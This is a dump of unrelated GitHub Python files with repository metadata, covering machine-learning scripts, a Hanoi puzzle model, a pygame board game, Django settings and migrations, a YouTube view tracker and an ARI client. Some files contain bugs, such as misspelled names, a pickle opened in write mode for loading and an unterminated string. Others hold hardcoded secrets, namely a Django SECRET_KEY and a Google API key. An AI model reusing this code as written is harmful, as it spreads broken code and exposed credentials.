print("RMSE: ", np.sqrt(metrcs.mean_square_error(y_test, predictions)))
|
[
"noreply@github.com"
] |
noreply@github.com
|
0df2bc1b85cc7cc16ad4f5c3476a7bcbe79fa94c
|
d50a7ffef5fde766e6d97b9b1f8cc49ad2b54630
|
/latplan/puzzles/model/hanoi.py
|
0630f6eeb9128a8caaac80ab6272c3defe37f66d
|
[] |
no_license
|
pucrs-automated-planning/latplan
|
3c31527bacd49cbe4501a9a13be8d02e3547747b
|
fadeaee0a49da92263dd72fb171b7f114b1cffd1
|
refs/heads/master
| 2021-07-15T19:16:44.571705
| 2019-01-24T17:38:00
| 2019-01-24T17:38:00
| 111,113,712
| 3
| 2
| null | 2018-09-10T17:20:09
| 2017-11-17T14:39:13
|
Python
|
UTF-8
|
Python
| false
| false
| 1,771
|
py
|
#!/usr/bin/env python3
import numpy as np
# config encoding:
# A config is a sequence of x-positions (towers)
# [0,2,1,2,1,0]
# since there is an implicit order that is enforced,
# the assignments of each disk to some tower defines a unique, valid state
# [0,2,1,2,1,0] == [[05][24][13]]
# random config is available from np.random.randint(0,3,size)
def generate_configs(disks=6,towers=3):
import itertools
return itertools.product(range(towers),repeat=disks)
# state encoding:
# intermediate representation for generating an image.
# XX each disk has an x-position and a y-position (counted from the bottom)
# each tower has a sequence of numbers (disks)
# in the decreasing order
# for example,
# [[012345678][][]] is the initial state of the tower
# [[][][012345678]] is the goal state of the tower
def config_state(config,disks,towers):
disk_state = []
for _ in range(towers):
disk_state.append([])
for disk,pos in enumerate(config):
disk_state[pos].append(disk)
return disk_state
def state_config(state,disks,towers):
config = np.zeros(disks,dtype=np.int8)
for i,tower in enumerate(state):
for disk in tower:
config[disk] = i
return config
def successors(config,disks,towers):
from copy import deepcopy
state = config_state(config,disks,towers)
succ = []
for i in range(towers):
for j in range(towers):
if j != i \
and len(state[i]) > 0 \
and ( len(state[j]) == 0 or state[j][0] > state[i][0] ):
# pseudo code
copy = deepcopy(state)
disk = copy[i].pop(0)
copy[j].insert(0,disk)
succ.append(state_config(copy,disks,towers))
return succ
|
[
"leonardo@lsa.pucrs.br"
] |
leonardo@lsa.pucrs.br
|
de883cc1f5cdb1aea8cfe37ce4a51db19552238b
|
0937aff71737318be1535917deed0b87987c40f7
|
/training_model.py
|
db69e61b187f571bf71b7b6e659790a3dd2e89f2
|
[] |
no_license
|
smemadi/aws_test
|
6d6d90fa7f7c06bfafe68495b7d44a7e18e1db08
|
248818b0ad89217d29a3ecbb66d40c2e07bab15f
|
refs/heads/master
| 2023-08-02T16:43:58.945227
| 2021-09-11T14:12:39
| 2021-09-11T14:12:39
| 405,395,652
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,108
|
py
|
import pandas as pd
import numpy as np
df=pd.read_csv("train.csv")
df_test=pd.read_csv("test.csv")
def get_title(name):
if "." in name:
return name.split(",")[1].split(".")[0].strip()
else:
return "No title"
titles=set([x for x in df.Name.map(lambda x: get_title(x))])
def shorter_titles(x):
title=x["Title"]
if title in ["Capt","Col","Major"]:
return "Officer"
elif title in ["Jonkheer","Don","the Countess","Dona","Lady","Sir"]:
return "Royalty"
elif title=="Mme":
return "Mrs"
elif title in ["Mlle","Ms"]:
return "Miss"
else:
return title
df["Title"]=df["Name"].map(lambda x: get_title(x))
df["Title"]=df.apply(shorter_titles,axis=1)
df.loc[df["Age"].isnull(),"Age"]=df["Age"].median()
df["Age"].fillna(df["Age"].median(),inplace=True)
df["Embarked"].fillna("S",inplace=True)
del df["Cabin"]
df.drop("Name",axis=1,inplace=True)
df.Sex.replace(("male","female"),(0,1),inplace=True)
df.Embarked.replace(("S","C","Q"),(0,1,2),inplace=True)
df.Title.replace(('Mr','Miss','Mrs','Master','Dr','Rev','Officer','Royalty'), (0,1,2,3,4,5,6,7), inplace = True)
df.drop("Ticket",axis=1,inplace=True)
##############
from sklearn.model_selection import train_test_split
x=df.drop(["Survived","PassengerId"],axis=1)
y=df["Survived"]
x_train,x_val,y_train,y_val=train_test_split(x,y,test_size=0.2,random_state=1979)
import pickle #It saves our model parameters. Fantastic!
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score
####
randomforest=RandomForestClassifier()
randomforest.fit(x_train,y_train)
y_pred=randomforest.predict(x_val)
accuracy_randomforest=round(accuracy_score(y_pred,y_val)*100,2)
#print("random forest acccuracy is :",accuracy_randomforest)
pickle.dump(randomforest,open('titanic_model.sav','wb'))
def prediction_model(pclass,sex,age,sibsp,parch,fare,embarked,title):
import pickle
x=[[pclass,sex,age,sibsp,parch,fare,embarked,title]]
randomforest=pickle.load(open('titanic_model.sav','wb'))
predictions=randomforest.predict(x)
print(predicitons)
|
[
"sid.emadi@gmail.com"
] |
sid.emadi@gmail.com
|
0d316c17ae6205c8d67b07880fd12e2b2f84359c
|
76ce1e3f85aff9fcd5e7a902b535af352922a9c5
|
/main.py
|
404c9fcd147cb256e475dc78941c04b772de1e16
|
[
"MIT"
] |
permissive
|
f-grimaldi/CivTableGame
|
3d8900417382bb0c890a1c1b994428d1083086bc
|
e4f73098f74db6f45f6e57faf0260c20c0c13a1e
|
refs/heads/main
| 2022-12-31T20:30:28.567302
| 2020-10-20T14:06:30
| 2020-10-20T14:06:30
| 305,722,757
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,077
|
py
|
import src.Table as Table
import src.Player as pl
import numpy as np
import pygame
import time
def plain_load_icons(player_number, resolution):
size = get_cell_size(player_number, resolution)
water_icon = pygame.transform.scale(pygame.image.load('imgs/water.png'), size)
mountain_icon = pygame.transform.scale(pygame.image.load('imgs/mountain.png'), size)
desert_icon = pygame.transform.scale(pygame.image.load('imgs/desert.jpg'), size)
forest_icon = pygame.transform.scale(pygame.image.load('imgs/tree.png'), size)
plain_icon = pygame.transform.scale(pygame.image.load('imgs/tree.png'), size)
undiscover_icon = pygame.transform.scale(pygame.image.load('imgs/undiscovered.png'), size)
player1_cap = pygame.transform.scale(pygame.image.load('imgs/base_capitol1.jpg'), size)
player1_city = pygame.transform.scale(pygame.image.load('imgs/base_city1.jpg'), size)
player2_cap = pygame.transform.scale(pygame.image.load('imgs/base_capitol2.jpg'), size)
player2_city = pygame.transform.scale(pygame.image.load('imgs/base_city2.jpg'), size)
player3_cap = pygame.transform.scale(pygame.image.load('imgs/base_capitol3.jpg'), size)
player3_city = pygame.transform.scale(pygame.image.load('imgs/base_city3.jpg'), size)
player4_cap = pygame.transform.scale(pygame.image.load('imgs/base_capitol4.jpg'), size)
player4_city = pygame.transform.scale(pygame.image.load('imgs/base_city4.jpg'), size)
return {'undiscover_icon': undiscover_icon,
'water_icon': water_icon,
'desert_icon': desert_icon,
'mountain_icon': mountain_icon,
'forest_icon': forest_icon,
'plain_icon': plain_icon,
'player1_cap': player1_cap,
'player1_city': player1_city,
'player2_cap': player2_cap,
'player2_city': player2_city,
'player3_cap': player3_cap,
'player3_city': player3_city,
'player4_cap': player4_cap,
'player4_city': player4_city,}
def get_cell_size(player_number, resolution):
cell_number = 4*player_number
return (resolution[0]//cell_number, resolution[1]//cell_number)
def display_map(screen, map, icon_dict, player_number, resolution):
value_to_icon = {-1: 'undiscover_icon', 0: 'water_icon', 3: 'desert_icon',
1: 'mountain_icon', 2: 'forest_icon', 4: 'plain_icon',
100: 'player1_cap', 101: 'player1_city', 102: 'p1_settler_icon', 103: 'p1_explorer_icon',
200: 'player2_cap', 201: 'player2_city', 202: 'p2_settler_icon', 203: 'p2_explorer_icon',
300: 'player3_cap', 301: 'player3_city', 302: 'p3_settler_icon', 303: 'p3_explorer_icon',
400: 'player4_cap', 401: 'player4_city', 402: 'p4_settler_icon', 403: 'p4_explorer_icon',
}
values = []
size = get_cell_size(player_number, resolution)
### Retrieve Cell object with wanted sequence
for row in range(map.map.shape[0]):
for i in range(4):
for col in range(map.map.shape[1]):
for j in range(4):
if map.map[row, col].discovered:
values.append(map.map[row, col].mapPiece[i, j])
else:
values.append(-1)
### Draw basic Cell
for n, v in enumerate(values):
r, c = n//(4*map.map.shape[0]), n%(4*map.map.shape[0])
where = (c*size[1], r*size[0])
screen.blit(icon_dict[value_to_icon[v.cell]], where)
### Add units if presents TODO
# if len(v.units) != 0:
# screen.blit(###TODO)
### Add resources if presents TODO
# if len(v.resources) != 0:
# screen.blit(##TODO)
if __name__ == '__main__':
### Vars
DISPLAY_SIZE = (900, 900)
N_PLAYERS = 4
### Other vars
position = [(0, 0), (0, 3), (3, 3), (3, 0)]
player_type = ['romans', 'arabs', 'chinese', 'greeks']
rotations = [180, 90, 0, 0]
### Display
pygame.init()
screen = pygame.display.set_mode(DISPLAY_SIZE)
### TITLE and ICON
pygame.display.set_caption('Civilization Table Game')
icon = pygame.image.load('imgs/logo.jpg')
pygame.display.set_icon(icon)
### GRAPHICS_ICON
plain_icon_dict = plain_load_icons(player_number=N_PLAYERS, resolution=DISPLAY_SIZE)
### MAP
map = Table.Map(number_of_players=len(player_type))
for n, player_id in enumerate(player_type):
map.set_player(player_id=player_id, rotation=rotations[n], row=position[n][0], column=position[n][1])
for i in range(len(player_type)):
for j in range(len(player_type)):
if (i, j) not in position:
map.set_random_mapPiece(row=i, column=j)
### PLAYERS
players = [pl.Player(player_type[i], starting_cordinates=position[i], rotation=rotations[i]) for i in range(N_PLAYERS)]
### DISCOVER EXAMPLE
map.map[1, 0].discovered = True
map.map[1, 3].discovered = True
map.map[2, 0].discovered = True
map.map[3, 2].discovered = True
### Display map
display_map(screen, map, plain_icon_dict, N_PLAYERS, DISPLAY_SIZE)
pygame.display.update()
### Create background color
screen.fill((200, 200, 200))
pygame.display.update()
### GAME SESSION
running = True
while running:
time.sleep(1)
### CREATE EVENT QUIT
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
time.sleep(1)
### Set CAPITOLS
for user in players:
user.found_city(map, user.starting_cordinates, where=(2, 2), is_capitol=True)
pygame.display.update()
### Set UNITS
for user in players:
user.create_units('settler', map, tesseract=[0, 0], where=(1, 1))
user.create_units('explored', map, tesseract=[0, 0], where=(1, 1))
|
[
"f.grimaldi.94@gmail.com"
] |
f.grimaldi.94@gmail.com
|
7912f7822fc55994073ac442f700ada40f6fe975
|
0cdd98e4ca426b38797781b37cee4cf059cd0500
|
/heapqo.py
|
2c700b2871ebc515540a4977e4746a18d676e575
|
[] |
no_license
|
SeanTKeegan/DeepCompression
|
0c205ec45d6f7f3daf6730360e8e47c48a93aa33
|
d0f9aa6c7d5173f21ae4dd93d0b772aaa6eb2c27
|
refs/heads/master
| 2020-04-09T09:02:55.374889
| 2019-05-22T08:29:25
| 2019-05-22T08:29:25
| 160,218,908
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,485
|
py
|
from __future__ import print_function, absolute_import
import functools
import heapq
__all__ = ["Heap"]
def _with_docstring(source):
@functools.wraps(source)
def _with_docstring_wrap(target):
target.__doc__ = source.__doc__
return target
return _with_docstring_wrap
class Heap(object):
"""Transform list, in-place, into a heap in O(len(heap)) time."""
def __init__(self, heap):
self.heap = heap
heapq.heapify(self.heap)
def __len__(self):
return len(self.heap)
def _validate_push(self, item):
try:
if self.heap:
item < self.heap[0] < item
except TypeError:
raise ValueError(
"can't order new item type ({}) with existing type ({})".format(
type(item).__name__, type(self.heap[0]).__name__
)
)
@_with_docstring(heapq.heappush)
def push(self, item):
self._validate_push(item)
heapq.heappush(self.heap, item)
@_with_docstring(heapq.heappop)
def pop(self):
return heapq.heappop(self.heap)
@_with_docstring(heapq.heappushpop)
def pushpop(self, item):
self._validate_push(item)
return heapq.heappushpop(self.heap, item)
@_with_docstring(heapq.heapreplace)
def replace(self, item):
self._validate_push(item)
return heapq.heapreplace(self.heap, item)
|
[
"noreply@github.com"
] |
noreply@github.com
|
60c88d77b0d2bfbd373891e2dbb359a5c6e1d25c
|
95c1d95350a9c2741b99ff8ac2e0bdfcbe638c6d
|
/leads/migrations/0008_contactus.py
|
fc677ccd8c95a5796d0104803901dfe083bb884a
|
[] |
no_license
|
jeevanc161/leadapp
|
67e0aa4e371878296a96447556294d04e1c5c4c0
|
8f801bdc02cc9a5ac136936b098ab747ae026173
|
refs/heads/master
| 2023-06-16T07:36:34.113816
| 2021-07-12T06:06:24
| 2021-07-12T06:06:24
| 380,223,057
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 689
|
py
|
# Generated by Django 3.1.2 on 2021-07-11 13:03
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('leads', '0007_auto_20210615_1002'),
]
operations = [
migrations.CreateModel(
name='Contactus',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=250)),
('email', models.EmailField(max_length=254)),
('subject', models.CharField(max_length=250)),
('message', models.TextField()),
],
),
]
|
[
"jeevanc162@gmail.com"
] |
jeevanc162@gmail.com
|
45ff2731d524714c05b51daf9bc57ef935b6cb18
|
d26a82e8e72bb945a45082f69c19e571c9b49240
|
/yohanneswebsite/settings.py
|
bb397b409ed51085af6859339cdac6a489bdfac9
|
[] |
no_license
|
Yohannes27/mathias
|
cc5fab8a0830f7a81a653a3eee618123afd24487
|
6beea7ddb293f1f9dc7d8f5d17dbe2407584f7fa
|
refs/heads/master
| 2023-05-31T20:11:57.551715
| 2021-07-15T20:52:32
| 2021-07-15T20:52:32
| 386,419,673
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,616
|
py
|
"""
Django settings for yohanneswebsite project.
Generated by 'django-admin startproject' using Django 3.0.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'o%2!l+&wc3n+23dsxpo+@)rx-#e-jt*+s$=1$8yepv5ddm5c(j'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = ['mathiasamare.herokuapp.com','127.0.0.1']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'base',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'yohanneswebsite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'yohanneswebsite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
'HOST': 'database endpoint',
'PORT': 'database port'
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
#STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
#STATIC_URL = '/staticfiles/'
#MEDIA_URL = '/images/'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATIC_URL = '/staticfiles/'
MEDIA_URL = '/images/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static')
]
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static')
]
|
[
"joelawro@gmail.com"
] |
joelawro@gmail.com
|
173430881189eee39a6784e04ac5bea75aad27ec
|
683bf84a00834a946416c96a0c311f6c8a56825a
|
/4.7_working_with_files.py
|
9da5d0da773269ceb98f36ea7e6246a1f0664f2b
|
[] |
no_license
|
ravinder79/python-exercises
|
39404cbd3cf1259d13cd51afa4dd92a98afdbd19
|
0db0499486f393b4957b72114aa6fc572043e55e
|
refs/heads/master
| 2021-01-06T18:04:02.977079
| 2020-11-03T02:30:12
| 2020-11-03T02:30:12
| 241,430,488
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,755
|
py
|
#Print out every line in the file.
#Print out every line in the file, but add a line numbers
with open('4.6_import_exercises.py', 'r') as f:
data = f.readlines()
for i, line in enumerate(data):
print(i+1, line)
#Print out every line in the file, but add a line numbers
#count = 0
# with open('4.6_import_exercises.py', 'r') as f:
# for lines in f:
# print(str(count)+'\t'+lines)
# count = count +1
# Create a variable named grocery_list. It should be a list, and the elements in the list should be a least 3 things
# that you need to buy from the grocery store.
grocery_list = ['milk', 'eggs', 'coke', 'chips']
# Create a function named make_grocery_list. When run, this function should write the contents of the grocery_list
# variable to a file named my_grocery_list.txt.
def make_grocery_list(list):
with open("grocery_list.txt", "w") as f:
for l in list:
f.writelines(l + '\n)
return f
make_grocery_list(grocery_list)
# Create a function named show_grocery_list. When run, it should read the items from the text file and show each item on the grocery list.
# def show_grocery_list(grocery_list):
# with open("grocery_list.txt", "r") as f:
# print(f.readlines())
def show_grocery_list(grocery_list):
with open("grocery_list.txt", "r") as f:
contents = f.readlines()
for item in contents:
print(item)
show_grocery_list(grocery_list)
# Create a function named buy_item. It should accept the name of an item on the grocery list, and remove that item from the list.
def buy_item(item):
grocery_list.remove(item)
make_grocery_list(grocery_list)
return show_grocery_list(grocery_list)
buy_item('eggs')
|
[
"ravinder79@gmail.com"
] |
ravinder79@gmail.com
|
68416e62dea54f46e7ba4cf6455434a962307eaf
|
a079a2b493095b354d3f5ec09a9fccddd4de0a6a
|
/youtubetracker/management/commands/populate_viewsapi.py
|
b222d8b0289179e5433387a662063abd4caf6022
|
[] |
no_license
|
benjo430/youtube-tracker
|
96d5f2798f93214abd9d61e1b5a6925a3c4c5186
|
9392df7406b55cb72fad7a7eedd476c4ef0ec761
|
refs/heads/master
| 2021-01-19T08:46:16.332966
| 2017-04-11T03:34:35
| 2017-04-11T03:34:35
| 87,673,065
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,728
|
py
|
from django.core.management.base import BaseCommand
from youtubetracker.models import Video, Viewcount
import requests
from lxml import html
import time
import datetime
import urlparse
import json
from parse import *
from datetime import timedelta
class Command(BaseCommand):
# This class allows us to run database populating commands by typing "python manage.py populate_db" into terminal
# Read here for more info: http://eli.thegreenplace.net/2014/02/15/programmatically-populating-a-django-database
# turn into two scripts (separate files) one to populate database from a spreadsheet and another to update all entries in database to add view counts for the day.
args = '<foo bar ...>'
help = 'our help string comes here'
#"https://www.googleapis.com/youtube/v3/videos?id=YLzTFYYDnnk&key=AIzaSyAveZmaAE0CHPPt6dSY4o_oitb-QTKp9ZU%20&part=snippet,statistics"
# Broken Vid: https://www.youtube.com/watch?v=ytZW3iyoFho
def populate(self):
allvideos = Video.objects.all()
print "Populating View Count for all videos in database..."
for video in allvideos:
if get_video_id(video.url) is not None:
videoid = get_video_id(video.url)
# Grab all viewcounts for this video and check the date to ensure its not today.
mostrecentdate = video.viewcount_set.order_by('-id')
empty = False
today = datetime.date.today()
if not mostrecentdate:
empty = True
else:
mostrecentdate = mostrecentdate[0].viewcountdate
if mostrecentdate != today or empty == True:
apiattempt = tryapi(videoid)
if apiattempt != False:
viewcountint = apiattempt
else:
scrapeattempt = tryscrape(videoid)
if scrapeattempt != False:
viewcountint = scrapeattempt
else:
print "!!!!!! -------- OUT OF OPTIONS. SETTING TO 0"
viewcountint = 0
try:
q = Video.objects.get(url=video.url)
q.viewcount_set.create(viewcountdate=today,viewcount=viewcountint)
print "SUCCESSFULLY SAVED!"
except:
print "Already added view count" + video.url
# try:
# q = Video.objects.get(url=video.url)
# q.viewcount_set.create(viewcountdate=today,viewcount=viewcountint)
# except:
# print "Already added view count" + video.url
def handle(self, *args, **options):
self.populate()
|
[
"benjo430@gmail.com"
] |
benjo430@gmail.com
|
73cf7cad52d0463b57d1ecf16f881b12da289fbd
|
102f42fc41326e89ff2cfdfb227d57e122c78800
|
/prime.py
|
04aef932140d124e6731a95f3f03b0590956fdd7
|
[] |
no_license
|
yamatharman/guvi
|
ca741917385cc6c4ef8631308397f8ca5865060f
|
3351ab1af30a62c052ba9a385679f0b6b33cf47b
|
refs/heads/master
| 2020-03-27T17:42:43.390166
| 2019-02-20T05:48:28
| 2019-02-20T05:48:28
| 146,868,650
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 192
|
py
|
#prime.py
num = int(input())
if num > 1:
for i in range(2,num):
if (num % i) == 0:
print("no")
break
else:
print("yes")
else:
print("Invalid")
|
[
"noreply@github.com"
] |
noreply@github.com
|
e5d021f764bf2a500658c2a962784f56ffc0f864
|
2b167e29ba07e9f577c20c54cb943861d0ccfa69
|
/numerical_analysis_backup/small-scale-multiobj/pod100_sa/pareto_arch2/pareto_ff/pareto8.py
|
c934f4633c223ab3a0093473ad66da38262a6453
|
[] |
no_license
|
LiYan1988/kthOld_OFC
|
17aeeed21e195d1a9a3262ec2e67d6b1d3f9ff0f
|
b1237577ea68ad735a65981bf29584ebd889132b
|
refs/heads/master
| 2021-01-11T17:27:25.574431
| 2017-01-23T05:32:35
| 2017-01-23T05:32:35
| 79,773,237
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,048
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 4 15:15:10 2016
@author: li
optimize both throughput and connections
"""
#import sys
#sys.path.insert(0, '/home/li/Dropbox/KTH/numerical_analysis/ILPs')
import csv
from gurobipy import *
import numpy as np
from arch2_decomposition_new import Arch2_decompose
np.random.seed(2010)
num_cores=3
num_slots=80
i = 8
time_limit_routing = 1200 # 1000
time_limit_sa = 108 # 10800
filename = 'traffic_matrix__matrix_'+str(i)+'.csv'
# print filename
tm = []
with open(filename) as f:
reader = csv.reader(f)
for idx, row in enumerate(reader):
if idx>11:
row.pop()
row = [int(u) for u in row]
tm.append(row)
tm = np.array(tm)*25
#%% arch2
betav1 = np.arange(0,0.105,0.005)
betav2 = np.arange(0.15,1.05,0.05)
betav3 = np.arange(10, 110, 10)
betav = np.concatenate((betav1, betav2, betav3))
connection_ub = []
throughput_ub = []
connection_lb = []
throughput_lb = []
obj_ub = []
obj_lb = []
for beta in betav:
m = Arch2_decompose(tm, num_slots=num_slots, num_cores=num_cores,alpha=1,beta=beta)
m.create_model_routing(mipfocus=1,timelimit=time_limit_routing,mipgap=0.01, method=2)
m.sa_heuristic(ascending1=False,ascending2=False)
connection_ub.append(m.connections_ub)
throughput_ub.append(m.throughput_ub)
obj_ub.append(m.alpha*m.connections_ub+m.beta*m.throughput_ub)
connection_lb.append(m.obj_sah_connection_)
throughput_lb.append(m.obj_sah_throughput_)
obj_lb.append(m.alpha*m.obj_sah_connection_+m.beta*m.obj_sah_throughput_)
# print m.obj_sah_/float(m.alpha*m.connections_ub+m.beta*m.throughput_ub)
result = np.array([betav,connection_ub,throughput_ub,obj_ub,
connection_lb,throughput_lb,obj_lb]).T
file_name = "result_pareto{}.csv".format(i)
with open(file_name, 'w') as f:
writer = csv.writer(f, delimiter=',')
writer.writerow(['beta', 'connection_ub', 'throughput_ub',
'obj_ub', 'connection_lb', 'throughput_lb', 'obj_lb'])
writer.writerows(result)
|
[
"li.yan.ly414@gmail.com"
] |
li.yan.ly414@gmail.com
|
4263c48ffd860e12a9590234e84baa57b8698a54
|
1d49dd44b5cadc173bacbfbbbfc8facd5665066f
|
/utils/preprocessing.py
|
b03f803fee123f87d685d033c90c89344bf5c714
|
[] |
no_license
|
anushalihala/text_analytics_propaganda_detection
|
eee34d23589c4fdb2580ddfabb9b54c828137424
|
bf6d64ed84d8ab79e5509c63bec7844b395b4436
|
refs/heads/master
| 2021-05-23T08:53:03.200357
| 2020-04-12T13:24:43
| 2020-04-12T13:24:43
| 253,207,748
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,665
|
py
|
import numpy as np
from nltk.tokenize import sent_tokenize
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
def map_target(df, col_name='target'):
return df[col_name].map({'propaganda':1,'non-propaganda':0})
def tokenize_text(text, word_to_idx):
text = text.lower()
tokens = word_tokenize(text)
#tokens = np.vectorize(lambda x: word_to_idx.get(x, word_to_idx['UNK']))(tokens) #returns np array
tokens = list(map(lambda x: word_to_idx.get(x, word_to_idx['UNK']), tokens)) #returns list
return tokens
def process_df(df, text_processor, processor_args, get_len=True):
df['target'] = map_target(df)
df['text']=df['text'].apply(lambda x: text_processor(x, **processor_args))
if get_len:
df['len']= df['text'].apply(lambda x: len(x))
return df
def get_sentiment_features(df, text_col='text', id_col='id'):
analyzer = SentimentIntensityAnalyzer()
features = {'neg_max':[], 'neg_min':[], 'neg_median':[], \
'pos_max':[], 'pos_min':[], 'pos_median':[], \
'neu_max':[], 'neu_min':[], 'neu_median':[]}
feature_fns = {'max':np.max, 'min':np.min, 'median':np.median}
for text in df[text_col]:
vs_lists = {'neg':[], 'pos':[], 'neu':[]}
for sent in sent_tokenize(text):
vs = analyzer.polarity_scores(sent)
for k in vs_lists.keys():
vs_lists[k].append(vs[k])
for k, vs_list in vs_lists.items():
for f, fn in feature_fns.items():
features[k+'_'+f].append(fn(vs_list))
features['id'] = df[id_col].values.tolist()
return features
|
[
"35848893+anushalihala@users.noreply.github.com"
] |
35848893+anushalihala@users.noreply.github.com
|
fc07069a46f82e9a773e82a5a7eb0fb9601e5399
|
6782adf725cd62576310e3b017be4c8e9703efea
|
/users/views.py
|
7d3046389893cfb666bd52f4ef2a4b01d3a19a78
|
[] |
no_license
|
momentum-team-4/django-final-project-jacqueline-harrison
|
e2b566dd28221e4f3ccf3bb5d58a267a05f39f21
|
355d6e14914cb1c9126dddc7b351834713c7d29e
|
refs/heads/master
| 2023-07-31T22:13:12.027385
| 2020-10-01T17:11:45
| 2020-10-01T17:11:45
| 298,834,657
| 0
| 0
| null | 2021-09-22T19:43:35
| 2020-09-26T14:44:18
|
Python
|
UTF-8
|
Python
| false
| false
| 1,273
|
py
|
from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from django.contrib.messages import success, error
from .forms import UserCreationForm
from .models import User
def create_user(request):
if request.method == "GET":
form = UserCreationForm()
else:
form= UserCreationForm(data=request.POST)
if form.is_valid():
form.save()
success(request, 'Login created')
return redirect(to='login_user')
return render(request, 'accounts/create_user.html', {"form": form})
def login_user(request):
if request.method == "POST":
username = request.POST['username']
password = request.POST['password']
user = authenticate(request, username=username, password=password)
if user is not None:
login(request, user)
success(request, 'Logged in Successfully')
return redirect(to='all_habits')
else:
error(request, 'username or password does not exist')
return render(request, 'accounts/login_user.html')
@login_required
def logout_user(request):
logout(request)
return redirect(to='login_user')
|
[
"jacqueline_25@hotmail.com"
] |
jacqueline_25@hotmail.com
|
26604b1e653b586dcc138356474bf5459ea54e2e
|
604fdb2c4fa24237d206e7c8835bb2c21b0a2fb7
|
/ari/v1/client.py
|
0f438dfd979c9fed793cc6fef8f04f0b37e2bc6d
|
[
"Apache-2.0"
] |
permissive
|
SibghatullahSheikh/python-ari
|
d8d87d213c1a52b0ed46a8ea50362b93c772325b
|
f4a6f870513bc74bf96606168e0d2173ed2f2ebb
|
refs/heads/master
| 2021-01-22T00:13:37.707863
| 2014-01-29T21:06:52
| 2014-01-29T21:06:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,344
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2012 OpenStack LLC.
# Copyright (c) 2013 PolyBeacon, Inc.
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from ari.common import http
from ari.v1 import application
from ari.v1 import bridge
from ari.v1 import channel
from ari.v1 import devicestate
from ari.v1 import endpoint
from ari.v1 import sound
class Client(http.HTTPClient):
"""Client for the ARI v1 API.
"""
def __init__(self, *args, **kwargs):
super(Client, self).__init__(*args, **kwargs)
self.applications = application.ApplicationManager(self)
self.bridges = bridge.BridgeManager(self)
self.channels = channel.ChannelManager(self)
self.devicestates = devicestate.DeviceStateManager(self)
self.endpoints = endpoint.EndpointManager(self)
self.sounds = sound.SoundManager(self)
|
[
"paul.belanger@polybeacon.com"
] |
paul.belanger@polybeacon.com
|
